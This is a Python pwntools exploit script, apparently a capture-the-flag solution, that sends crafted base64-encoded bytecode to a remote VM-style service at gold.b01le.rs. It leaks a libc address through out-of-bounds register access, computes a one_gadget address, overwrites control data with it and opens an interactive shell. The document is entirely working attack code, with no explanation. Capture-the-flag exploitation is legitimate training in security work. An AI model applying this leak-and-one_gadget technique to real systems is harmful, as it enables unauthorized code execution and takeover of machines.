1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
|
from pwn import *
from base64 import b64encode
def write_reg(reg1, reg2, imm):
code = p8(1)
code += p8(reg1)
code += p8(reg2)
code += p8(imm)
return code
def load_reg(reg1, reg2, imm):
code = p8(36)
code += p8(reg1)
code += p8(reg2)
code += p8(imm)
return code
def overwrite(reg, imm):
code = p8(3)
code += p8(0)
code += p8(reg)
code += p8(imm)
return code
def leak(reg1, reg2, imm):
code = p8(4)
code += p8(reg1)
code += p8(reg2)
code += p8(imm)
return code
def input_addr(size, reg, imm):
code = p8(34)
code += p8(size)
code += p8(reg)
code += p8(imm)
return code
def output_addr(size, reg, imm):
code = p8(33)
code += p8(size)
code += p8(reg)
code += p8(imm)
return code
def imm_to_reg(reg, imm):
code = p8(6)
code += p8(reg)
code += p16(imm)
return code
io = remote('gold.b01le.rs', 4003)
code = ''
for i in range(0xfe):
code += imm_to_reg(i+1, i+2)
code += imm_to_reg(0xff, 0x800f)
code += leak(8, 0xff, 0)
for i in range(7):
code += load_reg(i+1, 0xf, i)
code += output_addr(6, 0xf, 0)
code += input_addr(0x20, 0xf, 0)
code += write_reg(2, 0xf, 0)
code += write_reg(3, 0xf, 8)
code += overwrite(0xf, 0x10)
code += p32(0)
code = b64encode(code)
io.sendlineafter('>> ', code)
leak = u64(io.recv(6).ljust(8, '\x00')) - 0x10101010101
libc_base = leak - (0x7fbbbc6dc083 - 0x7fbbbc6b8000)
one = libc_base + 0xe3b01
io.send(p64(one) + p64(0) + p64(0x5d) + p64(0x5e))
io.interactive()
|
